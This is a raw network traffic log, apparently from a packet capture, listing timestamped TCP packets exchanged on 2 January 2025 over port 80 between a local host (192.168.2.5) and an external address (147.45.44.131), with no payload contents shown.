Jan 2, 2025 19:14:15.899990082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.899992943 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.899992943 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900002003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900019884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900029898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900033951 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900033951 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900043011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900053978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900064945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900064945 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900077105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900088072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900099039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900108099 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900110006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900121927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900132895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900156975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900157928 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900157928 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900170088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900173903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900182962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900194883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900204897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900217056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900223017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900228977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900243998 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900245905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900253057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900265932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900278091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900290012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900300980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900311947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900326967 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900330067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900374889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900374889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900615931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900669098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900681973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900691986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900703907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900713921 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900717020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900728941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900739908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900752068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.900760889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900790930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.900799990 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.907530069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907552004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907561064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907579899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907588959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907614946 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.907644987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907656908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907669067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907676935 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.907681942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.907711983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.907733917 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.943914890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.943937063 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.943947077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.943967104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.943984985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.943985939 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.943996906 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.944087982 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.944093943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.944103956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.944108009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.944150925 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.985512972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985518932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985529900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985536098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985542059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985548019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985553026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985558987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985596895 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.985666037 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.985842943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985913992 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.985982895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.985989094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986037016 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.986299038 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986486912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986501932 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986509085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986568928 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.986568928 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.986654997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986663103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986675024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986680984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986686945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986692905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986706018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986711025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986717939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986732960 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.986761093 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.986762047 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.986821890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.986884117 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987015009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987021923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987032890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987039089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987050056 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987063885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987070084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987075090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987076044 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987082005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987088919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987123966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987137079 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987267017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987272978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987286091 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987292051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987298012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987303019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987308979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987323046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987344980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987344980 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987364054 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987433910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987440109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987446070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987508059 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987586021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987592936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987598896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987606049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987685919 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987740040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987754107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987787008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.987907887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987921953 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987927914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987938881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987945080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987957001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987962961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987973928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987987041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.987993002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988003969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988014936 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988014936 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988053083 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988111973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988126993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988137960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988145113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988195896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988195896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988282919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988290071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988301039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988321066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988352060 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988379955 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988449097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988461971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988468885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988475084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988535881 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988615990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988622904 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988627911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988639116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988643885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988684893 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988778114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988790989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988797903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988804102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988811970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988847017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988847017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.988934040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988940954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988953114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988959074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988964081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988970041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988976002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988981962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.988998890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.989085913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989092112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989105940 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989113092 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.989160061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.989239931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989247084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989257097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989263058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.989367008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.995151043 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995157957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995171070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995176077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995182991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995187998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995193958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.995234013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.995268106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.031095028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031102896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031116009 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031121969 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031128883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031150103 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.031239033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031245947 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.031245947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031321049 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.031419992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.031532049 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079631090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079647064 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079668999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079683065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079696894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079710007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079718113 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079731941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079735994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079746962 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079761028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079765081 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079766989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079778910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079785109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079790115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079796076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079807997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079809904 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079813957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079821110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079826117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079830885 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079832077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079838037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079843998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079854965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079858065 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079862118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079868078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079874039 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079879999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079885006 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079885960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079891920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079896927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079901934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079902887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079915047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079921007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079926968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079931974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079936981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079936981 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079937935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079942942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079948902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079953909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079958916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079965115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079968929 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079976082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079982042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079982996 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.079993010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.079999924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080010891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080015898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080020905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080025911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080032110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080032110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080032110 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080038071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080050945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080054998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080060005 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080065966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080068111 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080068111 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080071926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080079079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080089092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080091953 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080096960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080101967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080107927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080112934 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080117941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080121994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080123901 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080135107 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080137014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080142975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080148935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080158949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080159903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080167055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080182076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080188990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080194950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080195904 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080195904 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080200911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080207109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080210924 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.080214024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080219030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080224991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080229998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080235958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080240965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080246925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080256939 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.080262899 CET	80	49721	147.45.44.131	192.168.2.5
